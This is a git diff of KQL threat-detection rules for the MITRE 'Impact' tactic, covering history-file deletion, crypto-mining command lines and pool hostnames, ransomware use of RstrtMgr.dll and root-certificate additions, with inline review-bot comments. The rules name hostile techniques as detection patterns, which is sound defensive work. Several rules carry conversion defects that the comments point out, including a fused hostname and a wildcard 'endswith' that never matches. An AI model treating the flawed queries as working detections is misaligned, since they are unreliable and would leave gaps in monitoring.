+DeviceProcessEvents
 | where (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql b/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql
index 54aab863..eac52baa 100644
--- a/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql
+++ b/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql
@@ -1,12 +1,12 @@
-// Title: Group Has Been Deleted Via Groupdel
-// Author: Tuan Le (NCSGroup)
-// Date: 2022-12-26
-// Level: medium
-// Description: Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1531
-// False Positives:
-// - Legitimate administrator activities
-
-DeviceProcessEvents
+// Title: Group Has Been Deleted Via Groupdel
+// Author: Tuan Le (NCSGroup)
+// Date: 2022-12-26
+// Level: medium
+// Description: Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1531
+// False Positives:
+// - Legitimate administrator activities
+
+DeviceProcessEvents
 | where FolderPath endswith "/groupdel"
\ No newline at end of file
diff --git a/KQL/rules/Impact/history_file_deletion.kql b/KQL/rules/Impact/history_file_deletion.kql
index 30214a1d..f9f30c29 100644
--- a/KQL/rules/Impact/history_file_deletion.kql
+++ b/KQL/rules/Impact/history_file_deletion.kql
@@ -1,12 +1,12 @@
-// Title: History File Deletion
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-06-20
-// Level: high
-// Description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1565.001
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: History File Deletion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: high
+// Description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1565.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (FolderPath endswith "/rm" or FolderPath endswith "/unlink" or FolderPath endswith "/shred") and ((ProcessCommandLine contains "/.bash_history" or ProcessCommandLine contains "/.zsh_history") or (ProcessCommandLine endswith "_history" or ProcessCommandLine endswith ".history" or ProcessCommandLine endswith "zhistory"))
\ No newline at end of file
diff --git a/KQL/rules/Impact/linux_crypto_mining_indicators.kql b/KQL/rules/Impact/linux_crypto_mining_indicators.kql
index 810b845f..159fa543 100644
--- a/KQL/rules/Impact/linux_crypto_mining_indicators.kql
+++ b/KQL/rules/Impact/linux_crypto_mining_indicators.kql
@@ -1,12 +1,12 @@
-// Title: Linux Crypto Mining Indicators
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-10-26
-// Level: high
-// Description: Detects command line parameters or strings often used by crypto miners
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1496
-// False Positives:
-// - Legitimate use of crypto miners
-
-DeviceProcessEvents
+// Title: Linux Crypto Mining Indicators
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects command line parameters or strings often used by crypto miners
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+// - Legitimate use of crypto miners
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "sh -c /sbin/modprobe msr allow_writes=on" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL"
\ No newline at end of file
diff --git a/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql b/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql
index 78adb04d..d12702fd 100644
--- a/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql
+++ b/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql
@@ -1,12 +1,12 @@
-// Title: Linux Crypto Mining Pool Connections
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-10-26
-// Level: high
-// Description: Detects process connections to a Monero crypto mining pool
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1496
-// False Positives:
-// - Legitimate use of crypto miners
-
-DeviceNetworkEvents
+// Title: Linux Crypto Mining Pool Connections
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects process connections to a Monero crypto mining pool
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+// - Legitimate use of crypto miners
+
+DeviceNetworkEvents
 | where RemoteUrl in~ ("pool.minexmr.com", "fr.minexmr.com", "de.minexmr.com", "sg.minexmr.com", "ca.minexmr.com", "us-west.minexmr.com", "pool.supportxmr.com", "mine.c3pool.com", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-asia1.nanopool.org", "xmr-jp1.nanopool.org", "xmr-au1.nanopool.org", "xmr.2miners.com", "xmr.hashcity.org", "xmr.f2pool.com", "xmrpool.eu", "pool.hashvault.pro", "moneroocean.stream", "monerocean.stream")
\ No newline at end of file
diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
index ffd88b56..55ec5c4e 100644
--- a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
+++ b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
@@ -1,14 +1,14 @@
-// Title: Load Of RstrtMgr.DLL By A Suspicious Process
-// Author: Luc Génaux
-// Date: 2023-11-28
-// Level: high
-// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
-// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-// It could also be used for anti-analysis purposes by shut downing specific processes.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001
-// False Positives:
-// - Processes related to software installation
-
-DeviceImageLoadEvents
+// Title: Load Of RstrtMgr.DLL By A Suspicious Process
+// Author: Luc Génaux
+// Date: 2023-11-28
+// Level: high
+// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
+// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
+// It could also be used for anti-analysis purposes by shut downing specific processes.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001
+// False Positives:
+// - Processes related to software installation
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql
index 6eb12974..1982b74c 100644
--- a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql
+++ b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql
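Review bot: The second disjunct on the ` | where` line, `InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll"`, compares the loading process's own version-info name with the DLL's name, so it can only be true when the loader itself is named RstrtMgr.dll; the Sigma `OriginalFileName` selector refers to the loaded image, and only `FolderPath endswith "\\RstrtMgr.dll"` actually carries the detection here. The same mapping is repeated in the next hunk (load_of_rstrtmgr_dll_by_an_uncommon_process.kql). As far as I can tell the DeviceImageLoadEvents table has no version-info column for the loaded image (verify against the schema you target); if that holds, drop the dead disjunct, or if the converter emits it generically, make it map image-load `OriginalFileName` to `FileName` so the rule's header does not suggest a second matching path that does not exist.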
@@ -1,15 +1,15 @@
-// Title: Load Of RstrtMgr.DLL By An Uncommon Process
-// Author: Luc Génaux
-// Date: 2023-11-28
-// Level: low
-// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.
-// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-// It could also be used for anti-analysis purposes by shut downing specific processes.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001
-// False Positives:
-// - Other legitimate Windows processes not currently listed
-// - Processes related to software installation
-
-DeviceImageLoadEvents
+// Title: Load Of RstrtMgr.DLL By An Uncommon Process
+// Author: Luc Génaux
+// Date: 2023-11-28
+// Level: low
+// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.
+// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
+// It could also be used for anti-analysis purposes by shut downing specific processes.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001
+// False Positives:
+// - Other legitimate Windows processes not currently listed
+// - Processes related to software installation
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains ":\\$WINDOWS.~BT\\" or InitiatingProcessFolderPath contains ":\\$WinREAgent\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\ProgramData\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\SoftwareDistribution\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysNative\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" or InitiatingProcessFolderPath contains ":\\WUDownloadCache\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp"))))
\ No newline at end of file
diff --git a/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql b/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql
index b0645f1b..eaba9eb0 100644
--- a/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql
+++ b/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql
@@ -1,12 +1,12 @@
-// Title: Network Communication With Crypto Mining Pool
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-10-26
-// Level: high
-// Description: Detects initiated network connections to crypto mining pools
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1496
-// False Positives:
-// - Unlikely
-
-DeviceNetworkEvents
+// Title: Network Communication With Crypto Mining Pool
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects initiated network connections to crypto mining pools
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+// - Unlikely
+
+DeviceNetworkEvents
 | where RemoteUrl in~ ("alimabi.cn", "ap.luckpool.net", "bcn.pool.minergate.com", "bcn.vip.pool.minergate.com", "bohemianpool.com", "ca-aipg.miningocean.org", "ca-dynex.miningocean.org", "ca-neurai.miningocean.org", "ca-qrl.miningocean.org", "ca-upx.miningocean.org", "ca-zephyr.miningocean.org", "ca.minexmr.com", "ca.monero.herominers.com", "cbd.monerpool.org", "cbdv2.monerpool.org", "cryptmonero.com", "crypto-pool.fr", "crypto-pool.info", "cryptonight-hub.miningpoolhub.com", "d1pool.ddns.net", "d5pool.us", "daili01.monerpool.org", "de-aipg.miningocean.org", "de-dynex.miningocean.org", "de-zephyr.miningocean.org", "de.minexmr.com", "dl.nbminer.com", "donate.graef.in", "donate.ssl.xmrig.com", "donate.v2.xmrig.com", "donate.xmrig.com", "donate2.graef.in", "drill.moneroworld.com", "dwarfpool.com", "emercoin.com", "emercoin.net", "emergate.net", "ethereumpool.co", "eu.luckpool.net", "eu.minerpool.pw", "fcn-xmr.pool.minergate.com", "fee.xmrig.com", "fr-aipg.miningocean.org", "fr-dynex.miningocean.org", "fr-neurai.miningocean.org", "fr-qrl.miningocean.org", "fr-upx.miningocean.org", "fr-zephyr.miningocean.org", "fr.minexmr.com", "hellominer.com", "herominers.com", "hk-aipg.miningocean.org",
"hk-dynex.miningocean.org", "hk-neurai.miningocean.org", "hk-qrl.miningocean.org", "hk-upx.miningocean.org", "hk-zephyr.miningocean.org", "huadong1-aeon.ppxxmr.com", "iwanttoearn.money", "jw-js1.ppxxmr.com", "koto-pool.work", "lhr.nbminer.com", "lhr3.nbminer.com", "linux.monerpool.org", "lokiturtle.herominers.com", "luckpool.net", "masari.miner.rocks", "mine.c3pool.com", "mine.moneropool.com", "mine.ppxxmr.com", "mine.zpool.ca", "mine1.ppxxmr.com", "minemonero.gq", "miner.ppxxmr.com", "miner.rocks", "minercircle.com", "minergate.com", "minerpool.pw", "minerrocks.com", "miners.pro", "minerxmr.ru", "minexmr.cn", "minexmr.com", "mining-help.ru", "miningpoolhub.com", "mixpools.org", "moner.monerpool.org", "moner1min.monerpool.org", "monero-master.crypto-pool.fr", "monero.crypto-pool.fr", "monero.hashvault.pro", "monero.herominers.com", "monero.lindon-pool.win", "monero.miners.pro", "monero.riefly.id", "monero.us.to", "monerocean.stream", "monerogb.com", "monerohash.com", "moneroocean.stream", "moneropool.com", "moneropool.nl", "monerorx.com", "monerpool.org", "moriaxmr.com", "mro.pool.minergate.com", "multipool.us", "myxmr.pw", "na.luckpool.net", "nanopool.org", "nbminer.com", "node3.luckpool.net", "noobxmr.com", "pangolinminer.comgandalph3000.com", "pool.4i7i.com", "pool.armornetwork.org", "pool.cortins.tk", "pool.gntl.co.uk", "pool.hashvault.pro", "pool.minergate.com", "pool.minexmr.com", "pool.monero.hashvault.pro", "pool.ppxxmr.com", "pool.somec.cc", "pool.support", "pool.supportxmr.com", "pool.usa-138.com", "pool.xmr.pt", "pool.xmrfast.com", "pool2.armornetwork.org", "poolchange.ppxxmr.com", "pooldd.com", "poolmining.org", "poolto.be", "ppxvip1.ppxxmr.com", "ppxxmr.com", "prohash.net", "r.twotouchauthentication.online", "randomx.xmrig.com", "ratchetmining.com", "seed.emercoin.com", "seed.emercoin.net", "seed.emergate.net", "seed1.joulecoin.org", "seed2.joulecoin.org", "seed3.joulecoin.org", "seed4.joulecoin.org", "seed5.joulecoin.org", "seed6.joulecoin.org", 
"seed7.joulecoin.org", "seed8.joulecoin.org", "sg-aipg.miningocean.org", "sg-dynex.miningocean.org", "sg-neurai.miningocean.org", "sg-qrl.miningocean.org", "sg-upx.miningocean.org", "sg-zephyr.miningocean.org", "sg.minexmr.com", "sheepman.mine.bz", "siamining.com", "sumokoin.minerrocks.com", "supportxmr.com", "suprnova.cc", "teracycle.net", "trtl.cnpool.cc", "trtl.pool.mine2gether.com", "turtle.miner.rocks", "us-aipg.miningocean.org", "us-dynex.miningocean.org", "us-neurai.miningocean.org", "us-west.minexmr.com", "us-zephyr.miningocean.org", "usxmrpool.com", "viaxmr.com", "webservicepag.webhop.net", "xiazai.monerpool.org", "xiazai1.monerpool.org", "xmc.pool.minergate.com", "xmo.pool.minergate.com", "xmr-asia1.nanopool.org", "xmr-au1.nanopool.org", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-jp1.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-us.suprnova.cc", "xmr-usa.dwarfpool.com", "xmr.2miners.com", "xmr.5b6b7b.ru", "xmr.alimabi.cn", "xmr.bohemianpool.com", "xmr.crypto-pool.fr", "xmr.crypto-pool.info", "xmr.f2pool.com", "xmr.hashcity.org", "xmr.hex7e4.ru", "xmr.ip28.net", "xmr.monerpool.org", "xmr.mypool.online", "xmr.nanopool.org", "xmr.pool.gntl.co.uk", "xmr.pool.minergate.com", "xmr.poolto.be", "xmr.ppxxmr.com", "xmr.prohash.net", "xmr.simka.pw", "xmr.somec.cc", "xmr.suprnova.cc", "xmr.usa-138.com", "xmr.vip.pool.minergate.com", "xmr1min.monerpool.org", "xmrf.520fjh.org", "xmrf.fjhan.club", "xmrfast.com", "xmrigcc.graef.in", "xmrminer.cc", "xmrpool.de", "xmrpool.eu", "xmrpool.me", "xmrpool.net", "xmrpool.xyz", "xx11m.monerpool.org", "xx11mv2.monerpool.org", "xxx.hex7e4.ru", "zarabotaibitok.ru", "zer0day.ru")
\ No newline at end of file
diff --git a/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql b/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql
index 1cf67326..44599194 100644
--- a/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql
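Review bot: The entry `"pangolinminer.comgandalph3000.com"` in the `RemoteUrl in~ (...)` list looks like two hostnames fused into one; since `in~` is an exact case-insensitive match, that string can never equal a real `RemoteUrl`, and both hostnames it seems to combine are effectively missing from the rule. Check the source list this was generated from and, if it is a join error in the converter, split it into `"pangolinminer.com", "gandalph3000.com"`. It would also be worth a converter-side check that every literal in such a list is a syntactically valid hostname, so this class of defect surfaces at generation time rather than in a rule that silently under-matches.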
+++ b/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql
@@ -1,13 +1,13 @@
-// Title: New File Exclusion Added To Time Machine Via Tmutil - MacOS
-// Author: Pratinav Chandra
-// Date: 2024-05-29
-// Level: medium
-// Description: Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility.
-// An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490
-// False Positives:
-// - Legitimate administrator activity
-
-DeviceProcessEvents
+// Title: New File Exclusion Added To Time Machine Via Tmutil - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-29
+// Level: medium
+// Description: Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility.
+// An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Legitimate administrator activity
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "addexclusion" and (FolderPath endswith "/tmutil" or ProcessCommandLine contains "tmutil")
\ No newline at end of file
diff --git a/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql b/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql
index 2a0ddd39..44a79c6c 100644
--- a/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql
+++ b/KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql
@@ -1,10 +1,10 @@
-// Title: New Root or CA or AuthRoot Certificate to Store
-// Author: frack113
-// Date: 2022-04-04
-// Level: medium
-// Description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1490
-
-DeviceRegistryEvents
+// Title: New Root or CA or AuthRoot Certificate to Store
+// Author: frack113
+// Date: 2022-04-04
+// Level: medium
+// Description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "Binary Data" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\AuthRoot\\Certificates*") and RegistryKey endswith "\\Blob"
\ No newline at end of file
diff --git a/KQL/rules/Impact/portable_gpg_exe_execution.kql b/KQL/rules/Impact/portable_gpg_exe_execution.kql
index 391e214a..70660e99 100644
--- a/KQL/rules/Impact/portable_gpg_exe_execution.kql
+++ b/KQL/rules/Impact/portable_gpg_exe_execution.kql
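Review bot: The ` | where` line can never match: KQL `endswith` has no wildcard, so each `RegistryKey endswith "...\\Certificates*"` branch requires the key to end in a literal asterisk, while the trailing `and RegistryKey endswith "\\Blob"` requires it to end in `\Blob`, and no string satisfies both. The Sigma trailing-`*` pattern should be translated to a prefix/substring test, e.g. `RegistryKey contains "\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates\\"` for each of the nine branches, keeping the final `endswith "\\Blob"` as the anchor. Separately, `RegistryValueData =~ "Binary Data"` mirrors how Sysmon renders binary values in its Details field; I am not certain the advanced-hunting table reports a REG_BINARY write with that string rather than the raw data or a type column, so confirm with a known-good event before relying on it. A rule that is meant to catch a new trusted root being installed deserves a quick positive test after conversion, since a silent zero-match here removes a high-value control.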
@@ -1,10 +1,10 @@
-// Title: Portable Gpg.EXE Execution
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-06
-// Level: medium
-// Description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1486
-
-DeviceProcessEvents
+// Title: Portable Gpg.EXE Execution
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-06
+// Level: medium
+// Description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoOriginalFileName =~ "gpg.exe" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (not((FolderPath contains ":\\Program Files (x86)\\GNU\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG VS-Desktop\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\Gpg4win\\bin\\")))
\ No newline at end of file
diff --git a/KQL/rules/Impact/potential_crypto_mining_activity.kql b/KQL/rules/Impact/potential_crypto_mining_activity.kql
index d6cfa7fc..96f5fa0f 100644
--- a/KQL/rules/Impact/potential_crypto_mining_activity.kql
+++ b/KQL/rules/Impact/potential_crypto_mining_activity.kql
@@ -1,13 +1,13 @@
-// Title: Potential Crypto Mining Activity
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-10-26
-// Level: high
-// Description: Detects command line parameters or strings often used by crypto miners
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1496
-// False Positives:
-// - Legitimate use of crypto miners
-// - Some build frameworks
-
-DeviceProcessEvents
+// Title: Potential Crypto Mining Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects command line parameters or strings often used by crypto miners
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+// - Legitimate use of crypto miners
+// - Some build frameworks
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL") and (not((ProcessCommandLine contains " pool.c " or ProcessCommandLine contains " pool.o " or ProcessCommandLine contains "gcc -")))
\ No newline at end of file
diff --git a/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql b/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql
index 14ac4dfa..c52573fc 100644
--- a/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql
+++ b/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql
@@ -1,10 +1,10 @@
-// Title: Potential File Overwrite Via Sysinternals SDelete
-// Author: frack113
-// Date: 2021-06-03
-// Level: high
-// Description: Detects the use of SDelete to erase a file not the free space
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1485
-
-DeviceProcessEvents
+// Title: Potential File Overwrite Via Sysinternals SDelete
+// Author: frack113
+// Date: 2021-06-03
+// Level: high
+// Description: Detects the use of SDelete to erase a file not the free space
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1485
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((ProcessCommandLine contains " -h" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " -z" or ProcessCommandLine contains " /?")))
\ No newline at end of file
diff --git a/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql b/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql
index 1a5b5174..21eea4ca 100644
--- a/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql
+++ b/KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql
@@ -1,10 +1,10 @@
-// Title: Potential Ransomware Activity Using LegalNotice Message
-// Author: frack113
-// Date: 2022-12-11
-// Level: high
-// Description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.t1491.001
-
-DeviceRegistryEvents
+// Title: Potential Ransomware Activity Using LegalNotice Message
+// Author: frack113
+// Date: 2022-12-11
+// Level: high
+// Description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1491.001
+
+DeviceRegistryEvents
 | where (RegistryValueData contains "encrypted" or RegistryValueData contains "Unlock-Password" or RegistryValueData contains "paying") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeCaption" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeText")
\ No newline at end of file
diff --git a/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql b/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql
index aa380599..1083ee9d 100644
--- a/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql
+++ b/KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql
@@ -1,13 +1,13 @@
-// Title: Potential Secure Deletion with SDelete
-// Author: Thomas Patzke
-// Date: 2017-06-14
-// Level: medium
-// Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
-// MITRE Tactic: Impact
-// Tags: attack.impact, attack.defense-evasion, attack.t1070.004, attack.t1027.005, attack.t1485, attack.t1553.002, attack.s0195
-// False Positives:
